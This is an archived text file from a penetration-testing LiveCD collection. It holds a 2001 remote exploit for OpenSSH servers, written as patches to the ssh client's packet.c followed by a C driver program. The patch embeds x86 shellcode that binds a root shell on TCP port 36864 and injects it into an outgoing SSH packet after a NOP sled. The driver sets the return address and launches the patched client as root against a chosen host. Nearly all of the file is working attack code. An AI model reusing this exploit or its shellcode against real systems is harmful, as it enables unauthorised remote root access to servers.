home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ssh / openssh / ssh-exploit-diffs.txt < prev    next >
Encoding:
Text File  |  2005-02-12  |  7.8 KB  |  276 lines
  1. # Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >.
  2.  
  3. - --- packet.c Sat Oct 14 06:23:12 2000
  4. +++ packet.c Tue Feb 20 09:33:00 2001
  5. @@ -68,6 +68,85 @@
  6.  #define DBG(x)
  7.  #endif
  8.  
  9. +
  10. +/*
  11. + *  Linux/x86
  12. + *  TCP/36864 portshell (old, could be optimized further)
  13. + */
  14. +
  15. +char shellcode[] = /* anathema <anathema@hack.co.za> */
  16. +/* main: */
  17. +"\xeb\x72"                                /* jmp callz               */
  18. +/* start: */
  19. +"\x5e"                                    /* popl %esi               */
  20. +
  21. +  /* socket() */
  22. +"\x29\xc0"                                /* subl %eax, %eax         */
  23. +"\x89\x46\x10"                            /* movl %eax, 0x10(%esi)   */
  24. +"\x40"                                    /* incl %eax               */
  25. +"\x89\xc3"                                /* movl %eax, %ebx         */
  26. +"\x89\x46\x0c"                            /* movl %eax, 0x0c(%esi)   */
  27. +"\x40"                                    /* incl %eax               */
  28. +"\x89\x46\x08"                            /* movl %eax, 0x08(%esi)   */
  29. +"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
  30. +"\xb0\x66"                                /* movb $0x66, %al         */
  31. +"\xcd\x80"                                /* int $0x80               */
  32. +
  33. +  /* bind() */
  34. +"\x43"                                    /* incl %ebx               */
  35. +"\xc6\x46\x10\x10"                        /* movb $0x10, 0x10(%esi)  */
  36. +"\x66\x89\x5e\x14"                        /* movw %bx, 0x14(%esi)    */
  37. +"\x88\x46\x08"                            /* movb %al, 0x08(%esi)    */
  38. +"\x29\xc0"                                /* subl %eax, %eax         */
  39. +"\x89\xc2"                                /* movl %eax, %edx         */
  40. +"\x89\x46\x18"                            /* movl %eax, 0x18(%esi)   */
  41. +"\xb0\x90"                                /* movb $0x90, %al         */
  42. +"\x66\x89\x46\x16"                        /* movw %ax, 0x16(%esi)    */
  43. +"\x8d\x4e\x14"                            /* leal 0x14(%esi), %ecx   */
  44. +"\x89\x4e\x0c"                            /* movl %ecx, 0x0c(%esi)   */
  45. +"\x8d\x4e\x08"                            /* leal 0x08(%esi), %ecx   */
  46. +"\xb0\x66"                                /* movb $0x66, %al         */
  47. +"\xcd\x80"                                /* int $0x80               */
  48. +
  49. +  /* listen() */
  50. +"\x89\x5e\x0c"                            /* movl %ebx, 0x0c(%esi)   */
  51. +"\x43"                                    /* incl %ebx               */
  52. +"\x43"                                    /* incl %ebx               */
  53. +"\xb0\x66"                                /* movb $0x66, %al         */
  54. +"\xcd\x80"                                /* int $0x80               */
  55. +
  56. +  /* accept() */
  57. +"\x89\x56\x0c"                            /* movl %edx, 0x0c(%esi)   */
  58. +"\x89\x56\x10"                            /* movl %edx, 0x10(%esi)   */
  59. +"\xb0\x66"                                /* movb $0x66, %al         */
  60. +"\x43"                                    /* incl %ebx               */
  61. +"\xcd\x80"                                /* int $0x80               */
  62. +
  63. +  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
  64. +"\x86\xc3"                                /* xchgb %al, %bl          */
  65. +"\xb0\x3f"                                /* movb $0x3f, %al         */
  66. +"\x29\xc9"                                /* subl %ecx, %ecx         */
  67. +"\xcd\x80"                                /* int $0x80               */
  68. +"\xb0\x3f"                                /* movb $0x3f, %al         */
  69. +"\x41"                                    /* incl %ecx               */
  70. +"\xcd\x80"                                /* int $0x80               */
  71. +"\xb0\x3f"                                /* movb $0x3f, %al         */
  72. +"\x41"                                    /* incl %ecx               */
  73. +"\xcd\x80"                                /* int $0x80               */
  74. +
  75. +  /* execve() */
  76. +"\x88\x56\x07"                            /* movb %dl, 0x07(%esi)    */
  77. +"\x89\x76\x0c"                            /* movl %esi, 0x0c(%esi)   */
  78. +"\x87\xf3"                                /* xchgl %esi, %ebx        */
  79. +"\x8d\x4b\x0c"                            /* leal 0x0c(%ebx), %ecx   */
  80. +"\xb0\x0b"                                /* movb $0x0b, %al         */
  81. +"\xcd\x80"                                /* int $0x80               */
  82. +
  83. +/* callz: */
  84. +"\xe8\x89\xff\xff\xff"                    /* call start              */
  85. +"/bin/sh";
  86. +
  87. +
  88.  /*
  89.   * This variable contains the file descriptors used for communicating with
  90.   * the other side.  connection_in is used for reading; connection_out for
  91. @@ -125,6 +204,9 @@
  92.  /* Session key information for Encryption and MAC */
  93.  Kex *kex = NULL;
  94.  
  95. +/* Packet Number */
  96. +int count = 0;
  97. +
  98.  void
  99.  packet_set_kex(Kex *k)
  100.  {
  101. @@ -461,6 +543,8 @@
  102.   unsigned int checksum;
  103.   u_int32_t rand = 0;
  104.  
  105. + count++;
  106. +
  107.   /*
  108.    * If using packet compression, compress the payload of the outgoing
  109.    * packet.
  110. @@ -1172,7 +1256,64 @@
  111.  void
  112.  packet_write_poll()
  113.  {
  114. - - int len = buffer_len(&output);
  115. + int len;
  116. + char buf[50],*p,*ptr;
  117. + char code[270000];
  118. + long sz;
  119. + FILE *f; 
  120. +
  121. + if (count == 2)
  122. + {
  123. +  f = fopen("/tmp/code","r");
  124. +  fgets(buf,28,f); 
  125. +  fclose(f);  
  126. +
  127. +  sz = GET_32BIT(&buf[24]);
  128. +  buffer_clear(&output);
  129. +  buffer_append(&output,code,sz); 
  131. +  len = buffer_len(&output);
  132. +
  133. +    ptr = buffer_ptr(&output); 
  134. +
  135. +  for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8)
  136. +  {
  137. +  *p=buf[0];
  138. +  *(p+1)=buf[1];
  139. +  *(p+2)=buf[2];
  140. +  *(p+3)=buf[3];
  141. +  *(p+4)=buf[4];
  142. +  *(p+5)=buf[5];
  143. +  *(p+6)=buf[6];
  144. +  *(p+7)=buf[7];
  145. +  }
  146. +
  147. +  sz = ((GET_32BIT(&buf[20]) + 8) & ~7);
  148. +
  149. +  for(p = p ; p < ptr + sz ; p+=8)
  150. +  {
  151. +  *p=buf[8];
  152. +  *(p+1)=buf[9];
  153. +  *(p+2)=buf[10];
  154. +  *(p+3)=buf[11];
  155. +  *(p+4)=buf[12];
  156. +  *(p+5)=buf[13];
  157. +  *(p+6)=buf[14];
  158. +  *(p+7)=buf[15];
  159. +  }
  160. +
  161. +  sz = len - GET_32BIT(&buf[20]);
  163. +  memset(p,'\x90',sz);
  164. +  memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode));
  165. +  memcpy(ptr,&buf[20],4); 
  166. +
  167. +  count++;
  168. + }
  169. +
  170. + len = buffer_len(&output);
  171. +
  172. +
  173.   if (len > 0) {
  174.    len = write(connection_out, buffer_ptr(&output), len);
  175.    if (len <= 0) {
  176. @@ -1299,3 +1440,4 @@
  177.   max_packet_size = s;
  178.   return s;
  179.  }
  180. +
  181.  
  182. - ------------------------------------------------------------------------------------
  183.  
  184. /* 
  185.  
  186. THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY.
  187.  
  188. BlackSphere - Hugo Oliveira Dias
  189. Tue Feb 20 16:18:00 2001
  190.  
  191. Email: bsphere@clix.pt
  192. Homepage: http://planeta.clix.pt/bsphere
  193.  
  194. Exploit code for using the modified ssh
  195.  
  196. */
  197. #include <stdio.h>
  198. #include <stdlib.h>
  199. #include <unistd.h>
  200. #include <sys/types.h>
  201. #include <sys/stat.h>
  202. #include <fcntl.h>
  203.  
  204. /* Path to modified ssh */
  205. #define PATH_SSH "./ssh"
  206.  
  207. int main(int argc,char *argv[])
  208. {
  209.  int f;
  210.  int port;
  211.  unsigned long addr,*ptr;
  212.  char *buffer,*aux,ch,*ssh;
  213.  int i;
  214.  
  215.  if (argc < 8)
  216.  {
  217.   printf("\nUsage : %s <saved eip> <count> <packet length> <username length> <host> \
  218. <port> <h(i)>\n\n",argv[0]);
  219.  
  220.   fflush(stdout);
  221.   _exit(0);
  222.  }
  223.  
  224.  port=atoi(argv[6]);
  225.  
  226.  buffer = (char *) malloc(29);
  227.  
  228.  ptr = (unsigned long *) buffer;
  229.  
  230.  *(ptr++) = 1543007393 + strtoul(argv[1],0,10);
  231.  *(ptr++) = 0;
  232.  *(ptr++) = strtoul(argv[7],0,10);
  233.  *(ptr++) = 0;
  234.  *(ptr++) = 16520 + strtoul(argv[2],0,10);
  235.  *(ptr++) = strtoul(argv[3],0,10);
  236.  *(ptr++) = strtoul(argv[4],0,10);
  237.  
  238.  buffer[29]=0;
  239.  
  240.  for(i = 0 ; i < 27 ; i+=4)
  241.  {
  242.   aux = buffer + i;
  243.   ch=*aux;
  244.   *aux=*(aux+3);
  245.   *(aux+3)=ch;
  246.   ch=*(aux+1);
  247.   *(aux+1)=*(aux+2);
  248.   *(aux+2)=ch; 
  249.  } 
  250.  
  251.  printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10));
  252.  printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8);
  253.  printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7);
  254.  printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10));
  255.  fflush(stdout);
  256.  
  257.  
  258.  f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU);
  259.  write(f,buffer,28);
  260.  close(f);
  261.  
  262.  ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
  263.  
  264.  strcpy(ssh,PATH_SSH);
  265.  
  266.  sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]);
  267.  
  268.  printf("%s\n",ssh);
  269.  
  270.  system(ssh);
  271.  
  272.  _exit(0); 
  273. }
  274.  
  275.  
  276.